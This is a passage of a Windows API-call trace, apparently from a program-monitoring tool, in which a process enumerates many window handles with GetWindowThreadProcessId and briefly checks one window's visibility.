	[0571.922] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x17a4
	[0571.922] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1050
	[0571.922] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1694
	[0571.922] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1770
	[0571.923] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1720
	[0571.923] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x165c
	[0571.923] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1578
	[0571.923] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x16c0
	[0571.923] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x161c
	[0571.923] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1638
	[0571.923] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x15c8
	[0571.924] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1554
	[0571.924] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1674
	[0571.924] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1520
	[0571.924] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x14bc
	[0571.924] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf8c
	[0571.924] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe9c
	[0571.924] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1434
	[0571.924] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x14ec
	[0571.925] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xfcc
	[0571.925] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x12ac
	[0571.925] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1484
	[0571.925] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x934
	[0571.925] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc0c
	[0571.925] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xb08
	[0571.925] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x948
	[0571.925] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1178
	[0571.926] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x13e0
	[0571.926] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xcd0
	[0571.926] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x13fc
	[0571.926] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xdc8
	[0571.926] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc18
	[0571.926] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc2c
	[0571.926] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xa1c
	[0571.926] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1244
	[0571.927] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xdb0
	[0571.927] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1398
	[0571.927] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1358
	[0571.927] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1370
	[0571.927] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1340
	[0571.927] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x130c
	[0571.927] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x12c0
	[0571.927] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x12e4
	[0571.928] GetWindow (hWnd=0x2053a, uCmd=0x4) returned 0x0
	[0571.929] IsWindowVisible (hWnd=0x2053a) returned 0
	[0571.929] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1270
	[0571.929] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1298
	[0571.929] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x120c
	[0571.930] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x122c
	[0571.930] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x11c4
	[0571.930] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x11b0
	[0571.930] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1188
	[0571.931] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1148
	[0571.931] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1160
	[0571.931] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x10fc
	[0571.931] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe34
	[0571.931] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xea4
	[0571.932] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x514
	[0571.932] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe48
	[0571.932] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xbc8
	[0571.932] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xdf8
	[0571.932] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x318
	[0571.932] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xcac
	[0571.932] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x8bc
	[0571.932] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf9c
	[0571.933] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf48
	[0571.933] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe40
	[0571.933] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xecc
	[0571.933] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xeb8
	[0571.933] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe80
	[0571.933] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe98
	[0571.933] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe60
	[0571.933] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xee4
	[0571.934] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xf00
	[0571.934] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xdf0
	[0571.934] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xe1c
	[0571.934] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xdd0
	[0571.934] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xd94
	[0571.934] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xd74
	[0571.934] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xd00
	[0571.934] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xcd8
	[0571.935] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc84
	[0571.935] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xca4
	[0571.935] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc64
	[0571.935] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc24
	[0571.935] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xb84
	[0571.935] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xbac
	[0571.935] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x384
	[0571.935] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xab8
	[0571.936] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x33c
	[0571.936] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xa44
	[0571.936] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xa64
	[0571.936] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x8a8
	[0571.936] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xaf0
	[0571.936] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x88c
	[0571.936] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xb04
	[0571.936] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x910
	[0571.937] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x230
	[0571.937] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xac0
	[0571.937] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xab4
	[0571.937] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xaac
	[0571.937] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x3d0
	[0571.937] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x978
	[0571.937] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xa7c
	[0571.937] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x59c
	[0571.938] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xa88
	[0571.938] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xa6c
	[0571.938] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xa68
	[0571.938] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x9f8
	[0571.938] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xa04
	[0571.938] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x924
	[0571.938] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x8dc
	[0571.939] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x7dc
	[0571.939] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x768
	[0571.939] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x764
	[0571.939] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x820
	[0571.939] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x810
	[0571.939] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x794
	[0571.939] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x83c
	[0571.939] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x7ac
	[0571.940] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xb44
	[0571.940] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xb5c
	[0571.940] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x838
	[0571.940] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.940] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.940] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.940] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.940] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.941] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.941] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.941] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.941] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x818
	[0571.941] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x5b8
	[0571.941] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x494
	[0571.941] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1ec
	[0571.941] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x440
	[0571.942] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x7e8
	[0571.942] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x730
	[0571.942] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x2c8
	[0571.942] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x31c
	[0571.942] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x330
	[0571.942] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x128
	[0571.942] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x5c8
	[0571.943] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x6f8
	[0571.943] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x358
	[0571.943] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x73c
	[0571.943] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xb0
	[0571.943] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x250
	[0571.943] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x240
	[0571.943] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x790
	[0571.943] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x61c
	[0571.944] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x540
	[0571.944] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x538
	[0571.944] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x568
	[0571.944] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x538
	[0571.944] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x568
	[0571.944] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x538
	[0571.944] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x540
	[0571.944] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x540
	[0571.945] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x57c
	[0571.945] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x460
	[0571.945] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x554
	[0571.945] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.945] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x528
	[0571.945] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.945] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.945] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.945] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x79c
	[0571.946] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.946] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4e0
	[0571.946] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.946] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x460
	[0571.946] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x460
	[0571.946] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x44c
	[0571.947] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x778
	[0571.947] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x460
	[0571.947] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x558
	[0571.947] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.947] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.947] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x14b4
	[0571.947] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x149c
	[0571.948] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x14a8
	[0571.948] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1490
	[0571.948] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x14a4
	[0571.948] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x148c
	[0571.948] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1458
	[0571.948] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1b4c
	[0571.948] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1b3c
	[0571.948] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x19bc
	[0571.948] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x199c
	[0571.949] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1998
	[0571.949] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1994
	[0571.949] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1990
	[0571.949] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1984
